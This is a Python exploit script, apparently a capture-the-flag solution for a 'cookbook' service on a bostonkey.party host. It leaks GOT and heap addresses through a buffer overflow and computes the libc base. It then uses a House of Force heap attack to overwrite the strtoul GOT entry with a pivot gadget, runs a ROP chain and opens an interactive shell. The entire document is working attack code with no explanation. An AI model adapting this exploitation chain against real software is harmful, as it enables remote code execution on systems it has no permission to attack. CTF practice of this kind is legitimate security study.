from codez import *


#r = Remote('localhost',1234)
r = Remote('cookbook.bostonkey.party', 5000)
r.read('?')
r.sendline("mak")
r.read('=')
for c in ['c','n','a']:
    r.read('[')
    r.sendline(c)
r.read('?')
r.sendline('garlic')
r.read(':')
r.sendline('1')


p = 'A'*900 + pack('I',0x804D00C-8) + "\x00"*0xc

r.read('[')
r.sendline('i')
r.sendline(p)
r.read('uit')
r.sendline('p')
r.read('A');r.read('-')
got_leak=unpack('I'*(64/4),r.read(':')[:64])
print '--- the leak -- '
print map(hex,got_leak)

p =p = 'A'*900 + pack('I',0x804D0AC -8) + "\x00"*0xc 
r.read('[')
r.sendline('i')
r.sendline(p)
r.read('uit')
r.sendline('p')
r.read('A');r.read('-')
leak=r.read(':')
top = unpack('I',leak[:4])[0]
strtoul_got = 0x804D038 - 5840 - 8
hof_size = unpack('I',pack('i',(strtoul_got - 8 ) - top))[0] 
libc = got_leak[0] - 0x13f210
print '[*] top',hex(top)
print '[*] libc',hex(libc) 
print '[*] hof size',hex(hof_size)
p =p = 'A'*900 + pack('I',0x804D0AC -8) + "\xff"*0x40
r.read('[')
r.sendline('i')
r.sendline(p)
r.read('uit')
print 'pivot',hex(libc+0x00112e49)
## hof time...
raw_input('x')

r.read('[')
r.sendline('q')
r.read('[')
r.sendline('g')
r.read(':')
r.sendline(("0x%x"%hof_size))
r.read('is')

r.read('[')
r.sendline('g')
r.read(':')
r.sendline("5\n"+pack('I',libc+0x00112e49))

r.read('[')
r.sendline('g')
r.read(':')
r.sendline(pack('IIIII',libc+0xb37b0,0x41424344,libc+0x15f5db,0,0))
r.interactive()